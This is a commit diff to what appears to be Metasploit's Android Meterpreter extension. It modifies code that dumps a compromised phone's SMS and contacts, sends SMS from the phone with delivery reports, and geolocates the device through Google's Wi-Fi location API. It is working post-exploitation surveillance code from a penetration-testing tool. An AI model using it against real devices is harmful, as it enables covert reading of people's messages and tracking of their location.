bug fixes
Jack64
parent
761caa0a60
commit
31dcae6828
|
|
@ -18,15 +18,14 @@ module Rex
|
|||
attr_accessor :longitude
|
||||
|
||||
def initialize
|
||||
@uri = URI.parse(GOOGLE_API_URI)
|
||||
@uri = URI.parse(URI.encode(GOOGLE_API_URI))
|
||||
@wlan_list = []
|
||||
end
|
||||
|
||||
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
||||
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
||||
def fetch!
|
||||
@uri.query << @wlan_list.join("&")
|
||||
|
||||
@uri.query << @wlan_list.join("&wifi=")
|
||||
request = Net::HTTP::Get.new(@uri.request_uri)
|
||||
http = Net::HTTP::new(@uri.host,@uri.port)
|
||||
http.use_ssl = true
|
||||
|
|
@ -52,7 +51,7 @@ module Rex
|
|||
# @param ssid [String] ESSID associated with the mac
|
||||
# @param signal_strength [String] a thing like
|
||||
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
||||
@wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
|
||||
@wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
|
||||
end
|
||||
|
||||
def google_maps_url
|
||||
|
|
|
|||
|
|
@ -44,7 +44,7 @@ class Android < Extension
|
|||
def dump_sms
|
||||
sms = Array.new
|
||||
request = Packet.create_request('dump_sms')
|
||||
response = client.send_request(request)
|
||||
response = client.send_request(request,60)
|
||||
|
||||
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
||||
|
||||
|
|
@ -64,7 +64,7 @@ class Android < Extension
|
|||
def dump_contacts
|
||||
contacts = Array.new
|
||||
request = Packet.create_request('dump_contacts')
|
||||
response = client.send_request(request)
|
||||
response = client.send_request(request,60)
|
||||
|
||||
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
||||
|
||||
|
|
@ -120,18 +120,26 @@ class Android < Extension
|
|||
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
||||
end
|
||||
|
||||
def send_sms(dest,body)
|
||||
def send_sms(dest,body,dr)
|
||||
request = Packet.create_request('send_sms')
|
||||
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
||||
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
||||
response = client.send_request(request)
|
||||
resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
|
||||
return resp
|
||||
request.add_tlv(TLV_TYPE_SMS_DR,dr)
|
||||
if dr == false
|
||||
response=client.send_request(request)
|
||||
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
return sr
|
||||
else
|
||||
response=client.send_request(request,30)
|
||||
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
dr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
return [sr,dr]
|
||||
end
|
||||
end
|
||||
|
||||
def wlan_geolocate
|
||||
request = Packet.create_request('wlan_geolocate')
|
||||
response = client.send_request(request,45)
|
||||
response = client.send_request(request,60)
|
||||
networks=[]
|
||||
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
|
||||
|
||||
|
|
|
|||
|
|
@ -33,12 +33,14 @@ TLV_TYPE_CHECK_ROOT_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9019)
|
|||
|
||||
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
||||
|
||||
TLV_TYPE_SMS_SENT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9021)
|
||||
TLV_TYPE_SMS_SR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9021)
|
||||
|
||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||
|
||||
TLV_TYPE_SMS_DR = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9026)
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,6 +1,7 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/post/meterpreter'
|
||||
require 'msf/core/auxiliary/report'
|
||||
require 'rex/google_geolocation'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
|
|
@ -377,10 +378,12 @@ class Console::CommandDispatcher::Android
|
|||
send_sms_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-d' => [ true, 'Destination number' ],
|
||||
'-t' => [ true, 'SMS body text' ]
|
||||
'-t' => [ true, 'SMS body text' ],
|
||||
'-dr' => [ false, 'Wait for delivery report' ]
|
||||
)
|
||||
dest=''
|
||||
body=''
|
||||
dr=false
|
||||
send_sms_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when '-h'
|
||||
|
|
@ -392,6 +395,8 @@ class Console::CommandDispatcher::Android
|
|||
dest=val
|
||||
when '-t'
|
||||
body=val
|
||||
when '-dr'
|
||||
dr=true
|
||||
end
|
||||
}
|
||||
if (dest.blank? or body.blank?)
|
||||
|
|
@ -400,11 +405,25 @@ class Console::CommandDispatcher::Android
|
|||
print_line(send_sms_opts.usage)
|
||||
return
|
||||
end
|
||||
sent=client.android.send_sms(dest,body)
|
||||
if (sent)
|
||||
print_good('SMS sent')
|
||||
|
||||
sent=client.android.send_sms(dest,body,dr)
|
||||
if (dr)
|
||||
if (sent[0]=="Transmission successful")
|
||||
print_good("SMS sent - #{sent[0]}")
|
||||
else
|
||||
print_error("SMS send failed - #{sent[0]}")
|
||||
end
|
||||
if (sent[1]=="Transmission successful")
|
||||
print_good("SMS delivered - #{sent[1]}")
|
||||
else
|
||||
print_error("SMS delivery failed - #{sent[1]}")
|
||||
end
|
||||
else
|
||||
print_status('SMS failed to send')
|
||||
if (sent=="Transmission successful")
|
||||
print_good("SMS sent - #{sent}")
|
||||
else
|
||||
print_error("SMS send failed - #{sent}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -422,42 +441,36 @@ class Console::CommandDispatcher::Android
|
|||
print_line(wlan_geolocate_opts.usage)
|
||||
return
|
||||
end
|
||||
|
||||
print_status('Waiting for WiFi scan results...')
|
||||
}
|
||||
|
||||
log = client.android.wlan_geolocate
|
||||
wlan_list=''
|
||||
wlan_list=[]
|
||||
wlan_str=""
|
||||
log.each{|x|
|
||||
mac=x['bssid']
|
||||
ssid=x['ssid']
|
||||
ss=x['level']
|
||||
network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
|
||||
wlan_list << network_data
|
||||
wlan_list << [mac,ssid,ss.to_s]
|
||||
}
|
||||
|
||||
if wlan_list.blank?
|
||||
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
||||
return
|
||||
end
|
||||
g = Rex::GoogleGeolocation.new
|
||||
|
||||
# Build and send the request to Google
|
||||
url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
|
||||
uri = URI.parse(URI.encode(url))
|
||||
request = Net::HTTP::Get.new(uri.request_uri)
|
||||
http = Net::HTTP::new(uri.host,uri.port)
|
||||
http.use_ssl = true
|
||||
response = http.request(request)
|
||||
|
||||
# Gather the required information from the response
|
||||
if response && response.code == '200'
|
||||
results = JSON.parse(response.body)
|
||||
latitude = results["location"]["lat"]
|
||||
longitude = results["location"]["lng"]
|
||||
accuracy = results["accuracy"]
|
||||
print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
|
||||
print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}")
|
||||
else
|
||||
print_error("Failure connecting to Google for location lookup.")
|
||||
wlan_list.each do |wlan|
|
||||
g.add_wlan(*wlan)
|
||||
end
|
||||
begin
|
||||
g.fetch!
|
||||
rescue RuntimeError => e
|
||||
print_error("Error: #{e}")
|
||||
else
|
||||
print_status(g.to_s)
|
||||
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue